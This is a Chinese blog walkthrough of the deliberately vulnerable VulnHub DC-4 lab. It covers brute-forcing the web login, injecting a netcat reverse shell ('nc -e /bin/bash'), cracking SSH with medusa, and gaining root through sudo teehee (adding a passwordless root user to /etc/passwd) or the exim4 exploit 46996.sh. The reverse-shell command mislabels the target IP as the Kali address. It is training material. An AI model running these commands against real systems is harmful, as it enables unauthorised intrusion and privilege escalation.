DC-4 靶机详解(两个解法版本)

已于 2024-04-12 23:36:20 修改
阅读量892 收藏 20
点赞数 14
文章标签: 安全性测试 网络安全
于 2024-04-11 14:21:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TonyChaoWei/article/details/137637337
版权

DC4-靶机详解

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

靶机地址

  • https://www.vulnhub.com/entry/dc-4,313/

Description

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

Technical Information

DC-4 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

If there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

知识点

  • web 登录爆破 (前期)
  • web 命令执行 (中期)
  • 反弹 shell (中期)
  • SSH 爆破 (后期)
  • linux 提权 (后期)

网络模式:NAT
Kali :192.168.197.128
渗透测试机器:192.168.197.148

前期-信息收集

开始进行ping周围机器 进行IP探活

nmap -sP 192.168.197.0/24

在这里插入图片描述

排除法,去掉自己、宿主机、网关, `192.168.197.148就是目标了

扫描开放端口 看一眼开了那些服务和端口

nmap -A -v  192.168.197.148

这边可以看到这里就开放了两个端口(22、80) 直觉告诉我就是一个web 一个ssh

在这里插入图片描述

单纯一个登录页面,没有任何其他逻辑功能,比如密码找回、注册

那么接下来有几种手段,直接爆破账号密码,SQL注入,和爆破目录敏感文件等。因为这里没有做太多的限制所以我一开始想的就是用bp爆破先试一下 名字这里就是admin、那我们就使用sniper模式只爆破它的密码

首先先输入一个admin账户名,再随便输入一个密码 然后 登录抓包

在这里插入图片描述

然后这边通过对Length对降序排列 发现一个718 看上去异常.这里很容易就爆破出来了 就是一个弱口令 密码是happy

在这里插入图片描述

中期-漏洞利用

这边可以看到可以直接运行相关的命令

在这里插入图片描述

然后我们这边思路就比较清晰了,直接通过bp拦截流量、篡改数据 再发送到服务端

这里可以在 burp 中拦截请求,将 把ls±l 改成nc -e /bin/bash 192.168.197.148 5985(Kali 机IP),这里注意这个位置的空格要使用+占位符来表示

在这里插入图片描述

这里 kali 做好监听

nc -lvp 5985

此时 kali 以收到弹回的 shell,给他改成方便交互的

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

**

**

后期-提权

Version 1

接下来要想办法提权,查看能够登录的帐号 (这里查看passwd主要是为了查看本机有几个用户)

cat /etc/passwd | grep "/bin/bash"

root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

查看目录

ls /home/jim
ls /home/sam
ls /home/charles
ls /tmp

在这里插入图片描述
/home/jim/ 下发现了 mbox 文件,但是这个文件除了jim其他人都没有权限去读,那我们只能想办法去爆破出jim的账户出来

/home/jim/backups 下发现了 old-passwords.bak 文件, 很显然这是一个密码本 把这个密码本拿下来 搞到kali上来爆破

medusa -M ssh -h 192.168.197.148 -u jim -P pass.txt

这个命令使用了 Medusa 工具来进行 SSH 密码破解攻击,具体选项含义如下:

  • -M ssh:指定要使用 SSH 协议进行破解。
  • -h 192.168.197.148:指定目标主机的 IP 地址。
  • -u jim:指定要破解的用户名为 “jim”。
  • -P pass.txt:指定密码字典文件为 “pass.txt”,其中包含了要尝试的密码列表。

综合起来,这个命令的目的是使用 Medusa 工具对目标主机 192.168.197.148 上的 SSH 服务进行密码破解攻击,用户名为 “jim”,密码列表来源于文件 “pass.txt”。
在这里插入图片描述
果然!!! 爆破出来了 jibril04
好现在通过ssh 进入jim的账户

登录,并查看 mbox 内容

在这里插入图片描述

看上去像是一份邮件,去 /var/mail 看看是否有信息
在这里插入图片描述
在这里插入图片描述

发现一份 charles 给 jim 的信,他要去度假,老板让他把密码给 jim,ok 收获 charles 密码 ^xHhA&hvim0y

登录 charles 用户并尝试提权

su charles
sudo -l

在这里插入图片描述

Charles 可以使用 sudo 权限运行 teehee。teehee 可以干嘛?可以将标准输入复制到我们选择的文件中。那么我可以直接写一个 root 权限的用户到 /etc/passwd 下,也可以直接在 sudoers 里给 charles 所有权限

  1. 在这里直接嚣张一点创建一个IAMROOT的root用户 再用这个用户登录进去 拿到flag

    echo "IAMROOT::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su IAMROOT
whoami

在这里插入图片描述

Verion 2

这边连接进去了还可以 有另一种方案,可以直接在靶机上查看

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
这个命令用于在文件系统中查找所有属主为 root、且设置了 SUID 权限的文件,并将结果输出到标准输出。

具体解释如下:

  • find: 命令用于在文件系统中搜索文件和目录。
  • /: 指定搜索的起始路径为根目录。
  • -user root: 指定要搜索的文件的属主为 root。
  • -perm -4000: 指定要搜索的文件的权限设置中包含 SUID 位(即以数字形式表示的权限设置中包含 4,表示 SUID 权限)。
  • -print: 指定将搜索到的文件路径打印到标准输出。
  • 2>/dev/null: 将标准错误输出重定向到 /dev/null,即丢弃错误信息,以避免显示权限错误或无法访问的目录导致的错误信息干扰。

因此,这个命令的目的是在文件系统中查找属主为 root、并设置了 SUID 权限的文件,并将它们的路径输出到标准输出。

这里注意这个exim4,可以在这个上面动手脚提权

`/usr/sbin/exim4 -v`

这个命令 exim4 -v 是用于以交互式模式启动 Exim 4 邮件传输代理 (MTA) 并显示更多详细信息。

具体解释如下:

  • /usr/sbin/exim4:Exim 4 的可执行文件路径。
  • -v:表示启用详细的 verbose 模式,通常用于在执行过程中输出更多的调试和信息。

这里查看exim的漏洞 发现这里有个本地权限提升的一个shell脚本
在这里插入图片描述
这里把这个脚本拷过来,这里注意还需要转义一下成Unix格式

cp /usr/share/exploitdb/exploits/linux/local/46996.sh . 

dos2unix 46996.sh

这边老规矩把apache服务打开(先把payload移动到/var/www/html),把这个payload脚本传过去
在这里插入图片描述
这里注意 最好将payload移动到靶机tmp目录下,这样好操作

bash 46996.sh

后面的操作就无需多言了,转到root目录下 查看flag
在这里插入图片描述

Tony Leung^_^
关注
  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1920
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
vulnhub系列靶机--DC4
cyzCc的博客
02-23 794
vulnhub系列靶机DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
Vulnhub靶机:DC-4渗透详细过程
最新发布
菜鸟学渗透
04-29 344
Vulnhub靶机:DC-4渗透详细过程
DC-4靶机
mlws1900的博客
03-24 1001
下载不下来用迅雷下载。
DC4靶机
qq_40646572的博客
04-29 295
靶机信息搜集 发现DC4靶机是192.168.220.208,DC4靶机开启端口是22,80端口。 防止端口信息遗漏,扫描全部端口,nmap默认扫描端口0-1000。 端口扫描完成后,使用nmap脚本漏洞扫描。发现没有可以利用的漏洞。 尝试对靶机进行攻击 打开80端口的http服务,查看目标主机网站是否存在可以打穿到后台的漏洞。 首先进行目录扫描。 未搜集到任何可以利用的信息。。。 下面有两种思路,一种尝试sql注入,另一种,爆破http登录或者ssh爆破。 先尝试sql注入,失败。。。。 下.
DC4靶机练习
LSYZWF的博客
04-23 371
文章目录1、查看靶机的mac地址2、打开网页发现了需要密账号和密码进行登录3、用户名admin,密码:happy进行登录4、ssh爆破5、登录成功后,查看相关文件6、提权 实验环境:DC-4靶机,kali攻击机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、查看靶机的mac地址 扫描C段网络 nmap -sP 192.168.246.130/24 -o nmap.sP 发现目标主机的ip地址为192.168.246
DC-4靶机渗透
m0_62008601的博客
05-11 416
攻击机kali:192.168.56.102 靶机dc-4:192.168.56.105 扫描存活主机ip:arp-scan -l 接着扫描端口:nmap -sV -p- 192.168.56.105 发现开放80端口和22端口 ,存在http服务,用浏览器进行访问 可以看到是个登录页面且为admin信息系统登录,那用户名就是admin了,抓包对密码进行爆破 字典的话选自带的password.lst就行,路径/usr/share/john/password.lst 社区版bp调
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 641
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
dc-4 靶机渗透学习
..
03-19 3052
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
靶机渗透之DC-4
2301_76227305的博客
03-31 851
这个靶机主要是九头蛇的使用,还要了解一点点命令执行漏洞和teehee提权,这个teehee比较小众,我也是第一次见。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
VulnHub DC4
baynk的博客
05-18 339
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4586
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值